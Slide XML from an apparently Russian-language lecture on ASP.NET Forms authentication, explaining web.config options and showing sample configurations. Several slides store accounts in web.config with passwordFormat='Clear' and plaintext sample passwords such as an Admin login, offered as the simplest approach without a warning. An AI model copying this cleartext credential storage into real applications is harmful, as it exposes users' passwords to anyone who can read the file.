                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>куки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Каждое приложение должно иметь уникальное имя куки безопасности</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>.</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9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loginUrl</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ru-R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login.aspx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charset="0"/>
                        </a:rPr>
                        <a:t>Имя страницы на которую перенаправляется пользователь для подключения</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> Это должна быть страница в корневой папке приложения.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3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timeout</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ru-R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charset="0"/>
                        </a:rPr>
                        <a:t>Количество минут, прежде чем </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>authentication cookie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>станет не действительным</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>. ASP.NET </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>обновляет куки при его получении, если прошло более половины времени жизни куки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>.</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cookieless</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ru-R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UseDeviceProfile</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charset="0"/>
                        </a:rPr>
                        <a:t>Использовать ли куки для отправки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>forms authentication ticket </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>клиенту</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Возможные значения</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>AutoDetect, UseCookies, UseUri</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> и</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> UseDeviceProfile. </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8229600" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Хранение учетных записей в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1196975"/>
            <a:ext cx="8291512" cy="5472113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Задание способа аутентификации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>авторизации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>	&lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>		&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>		&lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>	  	    &lt;forms name="MyCookieName"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>		         loginUrl="DbLogin.aspx«</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>		         timeout="20"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  		         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>&lt;credentials passwordFormat="Clear"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>			&lt;user name="Admin" password="(Admin1)"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>			&lt;user name="Mario" password="Szpuszta"/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>			&lt;user name="Matthew" password="MacDonald"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> 		         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>&lt;/credentials&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>		    &lt;/forms&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>&lt;!-- Задание авторизации --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>	     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>&lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>      &lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>	&lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>&lt;/configuration&gt;</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ru-RU" sz="3200" smtClean="0"/>
              <a:t>Хранение учетных записей в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;forms name="MyCookieName"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;credentials passwordFormat="Clear"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>	&lt;user name="Admin" password="(Admin1)"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;user name="Mario" password="Szpuszta"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;/credentials&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;/forms&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;/authentication&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>    &lt;!-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" noProof="1" smtClean="0"/>
              <a:t>Задание авторизации --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>      &lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>&lt;/authorization&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="200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229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Хранение учетных записей в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412875"/>
            <a:ext cx="8229600" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Самый простой способ хранения учетных записей это файл конфигурации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>   &lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>   &lt;forms name="MyCookieName"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>      loginUrl="DbLogin.aspx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
